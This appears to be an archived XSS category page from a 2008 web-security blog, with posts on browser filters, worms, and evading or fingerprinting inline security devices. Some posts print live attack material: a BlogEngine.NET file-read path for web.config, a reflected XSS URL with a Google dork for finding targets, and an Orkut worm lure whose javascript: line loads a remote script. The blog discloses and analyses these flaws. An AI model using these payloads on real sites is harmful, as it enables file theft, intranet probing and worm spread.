Cenzic 232 Patent
Paid Advertising
web application security lab

Archive for the 'XSS' Category

XSSFilter Released

Wednesday, July 2nd, 2008

You may have already seen the news about the new XSSFilter in IE8.0 but I wanted to echo it here as well, because it’s a pretty major new release. It does a great job of preventing most of the reflected XSS attacks out there for default users of the browser when it hits production. Very cool stuff. By the way, the second link above also has a sneak peek as to another security feature in IE8.0 if you look closely.

Think of XSSFilter like noscript in Firefox, but without the turning off JS portion of the functionality, and unlike noscript, it’s default in the browser, so it will impact a lot more people. David Ross (the guy who came up with the term Cross Site Scripting in the first place, btw) wrote this tool to start tackling a problem he’s been thinking about for 8 or more years since that paper was first authored. It’s not perfect, don’t get me wrong, but it’s a huge leap forward in the right direction, and I was hugely honored to be a part of it, since I think it will have a great positive impact on consumer security while us security knuckle draggers figure out a way to get websites to start securing themselves.

Next on my wish list? Content restrictions!

ASP.NET 1.1 vs 2.0

Wednesday, April 23rd, 2008

My friend Michael Eddington did a very good write-up on the differences between ASP.NET 1.1 vs 2.0 in terms of XSS protection. Surprisingly, it’s actually gotten quite a bit worse between the two versions. So much so that all the event handlers are now wide open, directives are wide open, and style sheets are wide open. I haven’t tested this myself yet, but if Michael’s diagnosis is correct that’s spelling bad news for anyone who adopted the 2.0 filters to prevent against XSS.

The funny part is that I actually thought the old ASP.NET filters were pretty good, not perfect, maybe, but good. Not only did they prevent against most of the major classes of XSS vulns, but because of the heavy reliance on viewstates, it also made tampering credentials a far more difficult task, and in some cases entirely impossible (via CSRF). My question is why would you intentionally make your filters worse? For the time being I’d stick to 1.1 if you use ASP.NET and are really concerned about XSS.

BlogEngine.NET Intranet Hacking

Saturday, April 12th, 2008

I ran across a really good example of some of the Intranet hacking through web-pages that I was talking about a while back. Doing some poking around in BlogEngine.Net I found a great example of this where a file not only allows you to read files from the disk (including things like the web.config the sql.config and other sensitive files with the syntax /js.axd?path=/web.config etc… but also the syntax /js.axd?path=http://localhost/ would disclose local websites. Ouch.

To make matters worse, if I know someone is running this software internally and I don’t have direct access to it, I can use it to proxy my requests all through their intranet on my behalf because there is a cross site scripting attack in BlogEngine.NET with the syntax: search.aspx?q=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E.

So I would simply need to get a user that I knew belonged to a company running this software to click on an link. It would then force their browser back to the Intranet website running BlogEngine.NET, where the XSS would use XMLHTTPRequest to pull in the js.axd file’s results, which de-facto would allow me to read every site on their Intranet that wasn’t password protected, as well as enumerate RFC1918 looking for private IP space. Ouch again.

A few people asked me when I first talked about this if I had ever seen it in the wild, so it took me a while to find something that was this widespread (probably 100,000 public installs) this is probably the best working example I have seen. Google dork: BlogEngine.NET 1.3.0.0.

IE8.0 US-ASCII and Other Stuff

Monday, April 7th, 2008

David Ross had a good blog post a few weeks back about how IE8.0 is no longer vulnerable to the US-ASCII encoding attack. For those of you who don’t know what I’m talking about you can find an example of it on the charsets page. Looks like both of the browser manufacturers are stepping up their game a little for the next version of the browsers to hit the market.

On a side note, and something I’ve been meaning to post for a while now, I’ve found a discrepancy between IE and Firefox that I think is worth noting. Most of the time this isn’t an issue but most web-pages decode Unicode inputs, so the fact that Firefox automatically encodes every GET parameter with Unicode is not a big deal. However, if the page doesn’t do any conversions, but rather echos the data back exactly as it was seen Firefox isn’t vulnerable. However, Internet Explorer is - because it doesn’t convert " into %22 for instance.

It’s a subtle difference, and only effects certain websites, but it was big enough of an issue that I had to switch testing methods because Firefox wasn’t giving me the results I was expecting - even though I could see the vulnerability using a proxy. I don’t know what percentage of pages do this, but it will lead to a lot of false negatives in scanners that are looking for XSS injection, if they follow the RFC. Net result for me? Firefox = less good for testing and IE = less secure.

Meanwhile, not that anyone cares, but it turns out that blogging is going to make me die an unfortunate and unglamorous early death. And I always thought it was because it was going to be due to an explosion. You people totally owe me. I expect payment in the afterlife.

Symbiotic Vs Parasitic Computing

Saturday, March 15th, 2008

Whelp, I just concluded my rather long trip to Boston for the first annual SourceBoston conference. I actually had a great time. There were a few bugs in the conference here and there, but that’s not unexpected for any first-time conference (totally forgivable). I expect it to grow quite a bit in the future to given the quality talks I heard there. The talks were almost without exception technical or business oriented enough that I had a difficult time picking and choosing which ones I wanted to go to. So much so that this was the very first time I’ve ended up buying a talk after the conference was over. I’m glad I did too. The telephone defenses talk by James Atkinson was excellent - long (2.25 hours) but excellent.

The keynotes were all great, but the one that really stood out in my mind was the talk by Dan Geer. It was a fast speech with a lot of specifics about the correlation between genetics/biology and viral/worm propagation. Later that evening a bunch of the more technical/business people were asked to go to a dinner with Polaris Ventures. There I got a chance to speak with Dan a little more and gently chastised him for not mentioning Samy, which I think intrigued him.

After the dinner, I began thinking about one concept that was mentioned during Dan’s talk and was echoed a number of times during the dinner and then again the next day. The concept was around the fact that in some networks we are seeing a change between parasitic malicious software to symbiotic malicious software. That is, some of the best maintained machines are run by attackers. They are up to date, patched, the logs aren’t writing off the end of the disc, etc… Because bad guys take a great deal of pride and care in their machines, trying to keep other hackers off the boxes. They end up doing quite a bit of defense to insure they have the ability to maintain and control the box.

Okay, here’s where it gets really weird. Now let’s take that to it’s next logical bizarre conclusion - often machines are healthier with an attacker on it than without. In fact, bad guys really do their best to make sure they aren’t saturating the connection or making the machine too slow. It’s in their best interest to have their control over the machine persist. It’s a strange malicious harmony, where the host is fed and nourished by the aggressor organism. But that only really makes sense when an attacker has access to the system and can control the inner workings of the computer itself. Are there any parallels between this and web application security?

I’ve thought about this quite a bit over the last few days and I can’t come up with a single real world instance of where a malicious attack that doesn’t involve some level of OS compromise has been healthy for the host system in any way. Once you begin talking about remote file includes and command injection it’s the same thing as a typical worm or virus scenario, where the attacker may take a great deal of time and energy to protect the system, leaving only small back doors for themselves to recover control at will. But all the compromises that don’t allow for any form of system/OS level control have only damaging effects. XSS worms, CSRF, SQL injection, etc… None of which have any positive effects on the host system.

But each of those classes of vulnerabilities also share one other thing - with the exception of persistent XSS/HTML injection or changes to the database they each have very little longevity compared to OS compromises. Adding an account in a database clearly can persist indefinitely, but more often than not a bad guy is less interested in adding to a database than they are extracting information out of it, meaning the longevity is an afterthought. Persistent XSS that performs overtly malicious actions is typically uncovered quickly because of the real-time effects it typically has against the normal user base.

With that in mind, it would appear to be that the less persistent the attack the worse it is for the host system in terms of any tangible side benefits the attacker can bring to the table. There is little to no symbiosis in these forms of web application attacks. Now clearly you’d say it’s better to have an XSS attack than a computer compromise, and I’m not naive enough to think bad guys really care about the system. Rather their interests lie in maintaining control over their assets, which is an issue of economic loss aversion. But I definitely think there is some interesting side effects of malicious attacks here that are worth thinking through a little more.

Further, one rather interesting argument I’ve heard for protecting machines is for increased OS longevity, which costs enterprises less because of productivity loss when machine re-installs are required. This really is more of a problem when rampant spyware begins to slow down a machine to where it becomes almost unusable, or even unstable because of the poor quality of the spyware code requiring the owner to complain to their IT department. In that case it’s parasitic software. So perhaps what we are really interested in is stopping parasitic software and encouraging symbiotic software to lower IT costs. As long as the machine contains nothing sensitive it would end up driving down support costs, if there were no other negative effects, like having your IP space black holed for sending out too much spam. It sounds crazy, I know.

Jeremiah and I were talking about this with Dan from Polaris yesterday though. If you could somehow get someone to use XSS as a way to do compute type for processor intensive operations you could potentially sell that to people who have high levels of computational needs. I like that idea less than offering a free download to users for the processor or slice of bandwidth when not in use (symbiotic), in trade for hardening the machine against purely malicious (parasitic) attackers. We’ve seen things like this in the past, SETI at home, and the RC5 distributed cracking… but I consider both of those to be parasitic, offering little to nothing to the host machine. Interesting thought, anyway…

Orkut “Crush” Worm

Thursday, February 28th, 2008

I’m a little behind the times, catching up on my email, but I thought I’d post this first since it’s probably some of the most interesting stuff. Keyshor just sent me an interesting snippet related to another Orkut worm that I’m affectionately calling “Crush” given the mode of transport, which is the Orkut crush. Here’s Keyshor’s email (cleaned up slightly):

This is the vulnerable scrap

Find out who has crush on u….
wait 4 few minutes after pressing enter
Author–> Coder http://www.orkut.com/Profile.aspx?uid=12437994075478369725>:)
Just copy the JavaScript, paste it in your address bar and PRESS ENTER

*javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://002292.googlepages.com/crush.js';void(0)*

Trust me, ITS WORKING!!!

The site is down now, but I threw up the JavaScript source in the list of XSS worms so people could check it out. I was able to pull another version that was still alive here. It also appears that it may at least at one point have been a greasemonkey plugin by the headers, which is an interesting way to debug your DHTML malware, I suppose. Anyway, great snippet for those who want to do some more analysis.

Inline or Out of Bounds - Defeating Active Security Devices

Sunday, February 3rd, 2008

I’ve wrestled with the concept of inline devices to stop attacks for a long time. Disclaimer: no names of companies will be used in this post. However, there are legitimate reasons both to have inline devices and not to as well. Let’s look at the cons of inline security protection devices for a moment. The major cons of an out of band device have to do with high availability and throughput. In many networks even a fraction of a second delay is totally unacceptable. Packet loss is a non-starter too so an inline device must be able to handle the throughput that the pipe can generate (potentially gig line speeds). Also, the device cannot create a single point of failure, often requiring double the hardware for inline devices, which makes out of line boxes potentially more cost effective (assuming the cost of the switch, for the span port, or tap isn’t too high). Those things combine to make a pretty complex solve if you are determined to have an inline device.

Now the advantages of inline devices is that they can decelerate SSL traffic without requiring an extra external SSL accelerator and that they can see everything and potentially block anything that they detect as malicious. Let’s look at the difference in how an out of band IPS/WAF type device would have to work. Either it can make firewall rule entries by connecting to the firewall in front of the web application or it uses the China method of RST packets in one or both directions. Now, let’s dissect that scenario for a second.

For XSS this isn’t a terrible solution. RST packets in both directions means that anyone getting duped into clicking a link won’t see the resultant malicious JavaScript return to them. That’s great! Now let’s take SQL injection. There are two types of SQL injection that should be considered. The first is where I want to dump all the results from a database, or set my user account to be something other than what it should be which gives me a different sort of auth cookie - both require something to be sent back to the attacker, and because HTTP is a noisy protocol it’s totally feasible that it could block the packet before it’s sent. The other is where I want to change a password, or drop a table - where the attacker doesn’t need to get any result back. The same is true with remote file includes, or command injection. In each of those cases, the resultant request is not necessarily important for the attacker to “see” the results from the same IP address that they were attacking from. In fact, they could easily be different IPs, on unrelated ports, or at different times of day, etc…

So out of line security devices have a severe dis-advantage when it comes to the latter injection attacks (which can often be far more dangerous than the former attacks that involve reflected results). Attackers have long known how to use different IP addresses when necessary, so I don’t see any reason why they couldn’t do so in this case to evade the device or firewall rule. Not to mention firewall rules can often end up blocking lots of innocent people who happen to be behind the same NAT. So for my money, it looks like inline devices win that round - if throughput isn’t a major concern.

Further, there is another hidden problem here. Let’s say an attacker is unsure if an active security device is in place (either inline or out of line - it doesn’t matter), but doesn’t want to get erroneous results when testing. All the attacker would have to do is intentionally send something they would know should be blocked by any decent signature, and listen for a RST packet (if it is a device that sends one to you) or wait for nothing to be returned, (if it is the kind that sends the RST packet to the server or outright blocks the connection). With a large enough sample size of various default signatures, it’s possible to do actual versioning of the exact devices as well.

Enter the dawn of IPS/WAF fingerprinting. Code samples welcome.

Say Goodbye to IE6.0! Hello IE7.0!

Monday, January 21st, 2008

There’s an interesting article over on PC World about an auto-update that Microsoft is pushing on Feb 12th. This update will be an automatic update of IE6.0 to IE7.0. That’s right, folks… all you people who were writing exploits against IE6.0 will have little to no market share left. Here comes IE7.0. IE7.0 has a few significant improvements for XSS but probably the most notable change beyond the user interface is the anti-phishing technology.

I can completely see why Microsoft is taking this approach - although I think people who aren’t used to IE7.0 will revolt until they get used to it. But if you think about it from their biggest customer’s perspective - they want their users to stop getting exploited. It’s bad for business, it’s bad for security and it’s bad for public relations. So for all of you who had come to know and love IE6.0, you might as well go download it now and beat the curve. Resistance is futile! Although there are instructions on how to stop the upgrade if you really need swim upstream.

Another MySpace XSS Through an API

Monday, January 21st, 2008

One of the things I love to talk about when I’m ranting about the improper use of the same origin policy to dictate how we as security professionals are auditing a website is the use of APIs. Hackers don’t care that your browser sees them as different domains. If they can attack the API and that API has access to the same data that the main website does, but without the controls in place to lock it down, that much the better. Anyway, all of this and much much more will be covered in the OWASP preso that I’m doing in Minnesota on Feb 11th, for those of you who live nearby. But let me return to my rant for a second.

I’ve seen lots of examples of this in the wild, but for various reasons I haven’t been able to talk about them specifically until now. Rosario Valotta found an XSS in MySpace using the mobile API. MySpace being plagued with XSS vulns is really nothing new, but this is actually pretty interesting to me because it’s the first time I can publically point to a place where the API is the conduit for the attack. Where you’d normally be unable to enter JavaScript, on the mobile API the filters don’t exist. Good for bad guys, bad for consumers.

As Rosario pointed out, although this does end up on MySpace it wouldn’t make for a good worm, as the mobile platform doesn’t use the same credential as the website, so it would be impossible to propagate unless someone happened to be logged into the mobile platform when they visited an attacker’s malicious profile. Yes, folks, APIs need to be secured in the same way the website is. You are only as strong as the weakest link, and if you aren’t auditing those APIs you aren’t finding all your holes. Nice work by Rosario!

Diminutive Worm Contest Wrapup

Thursday, January 10th, 2008

While the fun is over, there is a lot to talk about in the wrap-up. So much so that I think it will take longer to deal with the output of the contest than the contest itself took. First of all, a huge congrats to both Giorgio Maone and Sirdarckcat for winning the contest with an incredibly small 161 byte worm. They tied because they both had nearly the same vector and it worked equally well. It was a tough battle and there were a lot of close calls, but various rules, cross browser compatibility and interoperability with Apache caused the pool of potential winners to be relatively small when the scoring was complete. However, that’s not to diminish everyone’s work - everyone did amazingly and I was very impressed when it all came together.

But now that leaves us to the aftermath. After looking at the contest for the first four days we may have figured out a way to potentially stop worm propagation. Unlike tracking this method actually may help companies devise plans on how to reduce the likelihood of worm propagation across their websites. This should put to rest the nay sayers who thought nothing good could come of this contest. The paper is not for everyone - it’s pretty complex (as worms tend to be), but I think the people who have the problem will understand how to use it in their own environments.

That said, there is at least two or three more potential outputs of this contest - including papers on propagation analytics, worm tracking technology, and potentially other things that I’m not privy to. Was it worth it? Absolutely. I couldn’t have been happier with the results. Thanks again to everyone who made it such a success. It was a lot of work, but it was the first step towards large scale worm defense. Again, a huge congrats to Giorgio Maone and Sirdarckcat!